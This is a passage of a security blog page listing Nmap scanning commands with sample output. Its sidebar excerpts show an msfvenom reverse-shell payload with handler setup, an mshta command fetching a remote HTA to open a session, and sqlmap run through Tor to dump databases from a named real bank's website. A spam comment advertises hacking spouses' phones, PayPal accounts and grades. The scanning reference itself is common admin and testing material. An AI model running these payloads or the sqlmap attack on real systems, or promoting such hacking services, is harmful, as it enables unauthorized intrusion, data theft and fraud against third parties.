Skip to main content

Some Useful Nmap commands

CYBERATOR

1: Scan a single host or an IP address (IPv4)

### Scan a single ip address ###
nmap 192.168.1.1
nmap cyberator.in
nmap -V cyberator.in (detailed output)

2: Scan multiple IP address or subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24
nmap 192.168.1.1,2,3 
 
You can scan a range of IP address too:
nmap 192.168.1.1-20
 
You can scan a range of IP address using a wildcard: 
nmap 192.168.1.*
 
Finally, you scan an entire subnet:
nmap 192.168.1.0/24
 

3: Read list of hosts/networks from a file (IPv4)

The -iL option allows you to read the list of target systems using a text file. This is useful to scan a large number of hosts/networks.

Step 1: Create a text file as follows:
cat > /tmp/network.txt

Sample outputs:
techbharat.org
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost 
 
The syntax is:
nmap -iL /tmp/network.txt
 

 4: Excluding hosts/networks (IPv4)

When scanning a large number of hosts/networks you can exclude hosts from a scan:
nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254

OR exclude list from a file called /tmp/exclude.txt
nmap -iL /tmp/network.txt --excludefile /tmp/exclude.txt

5: Turn on OS and version detection scanning script (IPv4)

nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL /tmp/network.txt 
 

6:Scan an IPv6 host/address

The -6 option enable IPv6 scanning. The syntax is:

nmap -6 IPv6-Address-Here 
nmap -6 techbharat.org
nmap -6 2607:f0d0:1002:51::4
nmap -v A -6 2607:f0d0:1002:51::4
 

7:Find out if a host/network is protected by a firewall

nmap -sA 192.168.1.254
nmap -sA techbharat.org
 

8:Scan a host when protected by the firewall

nmap -PN 192.168.1.1
nmap -PN techbharat.org

9: Scan a network and find out which servers and devices are up and running

This is known as host discovery or ping scan:

nmap -sP 192.168.1.0/24

Sample outputs:

Host 192.168.1.1 is up (0.00035s latency).
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Host 192.168.1.2 is up (0.0038s latency).
MAC Address: 74:44:01:40:57:FB (Unknown)
Host 192.168.1.5 is up.
Host nas03 (192.168.1.12) is up (0.0091s latency).
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 second
 

10:Display the reason a port is in a particular state

nmap --reason 192.168.1.1
nmap --reason techbharat.org

11:How do I perform a fast scan?

nmap -F 192.168.1.1

12: Only show open (or possibly open) ports

nmap --open 192.168.1.1
nmap --open techbharat.org
 

13: Show all packets sent and received

nmap --packet-trace 192.168.1.1
nmap --packet-trace techbharat.org

14:Show host interfaces and routes

This is useful for debugging (ip command or route command or netstat command like output using nmap)
 
nmap --iflist

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 02:01 IST
************************INTERFACES************************
DEV    (SHORT)  IP/MASK          TYPE        UP MAC
lo     (lo)     127.0.0.1/8      loopback    up
eth0   (eth0)   192.168.1.5/24   ethernet    up B0:34:6F:dd:31:E5
vmnet1 (vmnet1) 192.168.121.1/24 ethernet    up 00:50:56:C0:00:01
vmnet8 (vmnet8) 192.168.179.1/24 ethernet    up 00:50:56:C0:00:08
ppp0   (ppp0)   10.1.19.69/32    point2point up
 
**************************ROUTES**************************
DST/MASK         DEV    GATEWAY
10.0.31.178/32   ppp0
209.133.67.35/32 eth0   192.168.1.2
192.168.1.0/0    eth0
192.168.121.0/0  vmnet1
192.168.179.0/0  vmnet8
169.254.0.0/0    eth0
10.0.0.0/0       ppp0
0.0.0.0/0        eth0   192.168.1.2
 

15: How to scan specific ports?

map -p [port] hostName
## Scan port 80  
nmap -p 80 192.168.1.1
## Scan TCP port 80
nmap -p T:80 192.168.1.1    
## Scan UDP port 53  
nmap -p U:53 192.168.1.1    
## Scan two ports ##
nmap -p 80,443 192.168.1.1    
## Scan port ranges ##
nmap -p 80-200 192.168.1.1    
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1  
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254    
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports i.e. scan $number most common ports ##  
nmap --top-ports 5 192.168.1.1  
nmap --top-ports 10 192.168.1.1

Sample outputs:
Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE     SERVICE
21/tcp      closed      ftp
22/tcp      open        ssh
23/tcp      closed     telnet
25/tcp      closed     smtp
80/tcp      open       http
110/tcp    closed     pop3
139/tcp    closed    netbios-ssn
443/tcp    closed    https
445/tcp    closed    microsoft-ds
3389/tcp  closed    ms-term-serv
MAC Address: AA:BB:CC:DD:EE:FF (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
 

16: The fastest way to scan all your devices/computers for open ports ever

nmap -T5 192.168.1.0/24
 

17: How to detect remote operating system?

You can identify a remote host apps and OS using the -O option:
 
nmap -O 192.168.1.1
nmap -O  --osscan-guess 192.168.1.1
nmap -v -O --osscan-guess 192.168.1.1

Sample outputs:
Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:29 IST
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 01:29
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 01:29, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.22s elapsed
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.1.1 [1000 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 22/tcp on 192.168.1.1
Completed SYN Stealth Scan at 01:29, 0.16s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.1.1
Retrying OS detection (try #2) against 192.168.1.1
Retrying OS detection (try #3) against 192.168.1.1
Retrying OS detection (try #4) against 192.168.1.1
Retrying OS detection (try #5) against 192.168.1.1
Host 192.168.1.1 is up (0.00049s latency).
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Device type: WAP|general purpose|router|printer|broadband router
Running (JUST GUESSING) : Linksys Linux 2.4.X (95%)
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (95%)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=11/27%OT=22%CT=1%CU=30609%PV=Y%DS=1%G=Y%M=BCAEC5%TM=50B3CA
OS:4B%P=x86_64-unknown-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M2300ST11NW2%O2=M2300ST11NW2%O3=M2300NNT11NW2%O4=M2300ST11NW2%O5
OS:=M2300ST11NW2%O6=M2300ST11)WIN(W1=45E8%W2=45E8%W3=45E8%W4=45E8%W5=45E8%W
OS:6=45E8)ECN(R=Y%DF=Y%T=40%W=4600%O=M2300NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 12.990 days (since Wed Nov 14 01:44:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
           Raw packets sent: 1126 (53.832KB) | Rcvd: 1066 (46.100KB)

 

18: How do I detect remote services (server / daemon) version numbers?

nmap -sV 192.168.1.1

Sample outputs:
Starting Nmap 5.00 ( http://nmap.org ) at 2013-11-27 01:34 IST
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     Dropbear sshd 0.52 (protocol 2.0)
80/tcp open  http?
1 service unrecognized despite returning data. 
 

19: Scan a host using TCP ACK (PA) and TCP Syn (PS) ping

If firewall is blocking standard ICMP pings, try the following host discovery methods:
nmap -PS 192.168.1.1
nmap -PS 80,21,443 192.168.1.1
nmap -PA 192.168.1.1 
nmap -PA 80,21,200-512 192.168.1.1

20: Scan a host using IP protocol ping

nmap -PO 192.168.1.1
 

 

 

Labels:
Location: New Delhi, Delhi, India

Comments

  1. Joe29 November 2020 at 01:07

    hello do you need help in hacking about all your day to day activities such as hacking your spouse phone, bit coin, paypal or to increase your grade point and may more to cut short here is the contact of a hacker who help me in hacking stuff and i must recommend him to anyone who is interested in hacking to make life worth living at his/her favour contact the hacker via hack.truth77 at gmail dot com

    ReplyDelete

Post a Comment

Popular posts from this blog

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    set lport 8080    set lhost <your IP address>    exploit S
Post a Comment
Read more

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=
3 comments
Read more

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution. STEP 1: Check your IP configuration (in this practical I have kept it on Bridge) STEP 2: Fire-up msfconsole in the kali terminal and search for hta_server Commands : service apache2 start msfconsole search HTA use exploit/windows/misc/hta_server STEP 3: Set all the values in the Metasploit variables. Commands: set SRVHOST <Your IP> exploit STEP 4: Open powershell in windows and execute the following command (in your case different URL will be generated):  .\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta As the command gets executed it will open up a session in msfconsole. You can view the session using the following command: sessions -l and
Post a Comment
Read more